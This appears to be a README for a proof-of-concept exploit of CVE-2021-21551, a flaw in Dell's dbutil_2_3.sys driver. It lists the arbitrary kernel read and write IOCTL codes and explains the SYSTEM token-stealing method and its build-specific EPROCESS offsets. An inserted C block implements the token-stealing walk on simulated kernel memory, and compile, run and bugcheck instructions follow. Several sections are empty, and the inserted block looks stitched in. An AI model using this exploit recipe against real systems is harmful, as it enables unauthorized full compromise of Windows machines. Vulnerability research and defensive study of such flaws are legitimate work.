CVE-2021-21551

Simple PoC for exploiting CVE-2021-21551 for local privilege escalation (LPE) by spawning a cmd.exe running as SYSTEM.

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21551

An issue was discovered in the signed Dell Windows driver dbutil_2_3.sys that can lead to compromise of the whole local system. The driver's IOCTL dispatch routine does not validate the user-supplied buffer, so the caller controls the kernel addresses the driver reads from and writes to.

IOCTL

Any unprivileged local user can open a handle to the device and issue requests to the following IOCTL codes, which break the Windows security model:

Compiling PoC

This PoC uses IOCTL codes 0x9b0c1ec4 and 0x9b0c1ec8 for arbitrary kernel memory read and write respectively. It first locates PsInitialSystemProcess in the kernel to obtain the SYSTEM process token, then writes that token into the Token field of the current process's EPROCESS structure. The EPROCESS field offsets differ between Windows builds, so before compiling update them for your target build to avoid a BSOD, using https://www.vergiliusproject.com/

DWORD EPROCESS_ActiveProcessLinks = 0x2e8; // offset of EPROCESS.ActiveProcessLinks (LIST_ENTRY), build specific
DWORD EPROCESS_Token = 0x348;              // offset of EPROCESS.Token (EX_FAST_REF), build specific

Compile with Visual Studio (the Windows SDK headers are required). The ntdll definitions used by the PoC come from this header: https://github.com/mathisvickie/segy-software/blob/main/external/ntdll.h
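The token-stealing step described above, as an added example that is not the PoC's own code. The two kernel read/write primitives are stand-ins for the IOCTL-backed ones: on a real target they would be implemented with DeviceIoControl() against dbutil_2_3.sys (codes 0x9b0c1ec4 / 0x9b0c1ec8), whose request buffer layout is not shown here; in this example they are bounds-checked accesses into a constructed buffer standing in for kernel memory, so the walk can be run offline. The ActiveProcessLinks and Token offsets are the ones from this README; the UniqueProcessId offset 0x2e0 (immediately before ActiveProcessLinks) is an assumption for this example and must be checked for your build, like the other two.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Offsets from the README (Windows-build specific, check vergiliusproject.com). */
#define EPROCESS_ActiveProcessLinks 0x2e8
#define EPROCESS_Token              0x348
/* Assumed for this example: UniqueProcessId sits just before ActiveProcessLinks. */
#define EPROCESS_UniqueProcessId    0x2e0
#define EPROCESS_SIZE               0x400   /* spacing of the fake EPROCESS entries */

/* Constructed stand-in for kernel memory: a flat buffer behind a fake kernel base. */
#define KBASE 0xffff800000000000ULL
#define KSIZE (4 * EPROCESS_SIZE)
static uint8_t kmem[KSIZE];

/* Arbitrary read/write primitives. On a real target these wrap the two IOCTLs;
 * here an out-of-range access returns false, standing in for the page fault
 * (PAGE_FAULT_IN_NONPAGED_AREA) that wrong offsets would cause in the kernel. */
static bool kread64(uint64_t addr, uint64_t *out) {
    if (addr < KBASE || addr + 8 > KBASE + KSIZE) return false;
    memcpy(out, kmem + (addr - KBASE), 8);
    return true;
}
static bool kwrite64(uint64_t addr, uint64_t val) {
    if (addr < KBASE || addr + 8 > KBASE + KSIZE) return false;
    memcpy(kmem + (addr - KBASE), &val, 8);
    return true;
}

/* Address of fake EPROCESS entry idx (0 = System). */
uint64_t fake_eprocess(int idx) { return KBASE + (uint64_t)idx * EPROCESS_SIZE; }

/* Read the Token field of an EPROCESS (0 if the read faults). */
uint64_t read_token(uint64_t eprocess) {
    uint64_t t = 0;
    kread64(eprocess + EPROCESS_Token, &t);
    return t;
}

/* Walk the circular ActiveProcessLinks list starting at the System EPROCESS
 * (what PsInitialSystemProcess points to), find the entry whose UniqueProcessId
 * equals target_pid, and overwrite its Token with the System token.
 * Returns 0 on success, -1 if the pid is not in the list, -2 on a faulting access. */
int steal_token(uint64_t system_eprocess, uint64_t target_pid) {
    uint64_t system_token;
    if (!kread64(system_eprocess + EPROCESS_Token, &system_token)) return -2;

    uint64_t head = system_eprocess + EPROCESS_ActiveProcessLinks;
    uint64_t link = head;
    do {
        uint64_t eproc = link - EPROCESS_ActiveProcessLinks;  /* CONTAINING_RECORD */
        uint64_t pid;
        if (!kread64(eproc + EPROCESS_UniqueProcessId, &pid)) return -2;
        if (pid == target_pid)
            return kwrite64(eproc + EPROCESS_Token, system_token) ? 0 : -2;
        if (!kread64(link, &link)) return -2;                 /* follow Flink */
    } while (link != head);
    return -1;
}

/* Constructed sample data: three linked EPROCESS entries (System, a bystander, the target). */
void build_fake_process_list(void) {
    const uint64_t pids[3] = {4, 1234, 5678};
    const uint64_t toks[3] = {0xffff9a0011110000ULL, 0xffff9a0022220000ULL, 0xffff9a0033330000ULL};
    memset(kmem, 0, sizeof kmem);
    for (int i = 0; i < 3; i++) {
        uint64_t ep = fake_eprocess(i);
        kwrite64(ep + EPROCESS_UniqueProcessId, pids[i]);
        kwrite64(ep + EPROCESS_Token, toks[i]);
        kwrite64(ep + EPROCESS_ActiveProcessLinks,     fake_eprocess((i + 1) % 3) + EPROCESS_ActiveProcessLinks); /* Flink */
        kwrite64(ep + EPROCESS_ActiveProcessLinks + 8, fake_eprocess((i + 2) % 3) + EPROCESS_ActiveProcessLinks); /* Blink */
    }
}

int main(void) {
    build_fake_process_list();
    int rc = steal_token(fake_eprocess(0), 5678);
    printf("steal_token -> %d, target token now 0x%llx\n", rc,
           (unsigned long long)read_token(fake_eprocess(2)));
    return rc;
}
```

The walk mirrors what the PoC does after resolving PsInitialSystemProcess: every list entry is converted back to its EPROCESS with the ActiveProcessLinks offset, so a wrong offset shifts every field the loop touches, which is why the README's offset check matters. Some token-stealing code also masks the low 4 bits of the copied EX_FAST_REF value; this example copies it unchanged, as the README describes.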

Running

Tested on:

A successful run spawns a cmd.exe running as SYSTEM. If you get the bugcheck PAGE_FAULT_IN_NONPAGED_AREA, the EPROCESS offsets are probably wrong for your Windows build: recheck them against the Vergilius Project for the exact build before running again, since a wrong offset makes the PoC read and write the wrong fields of every process in the list.

Sample output: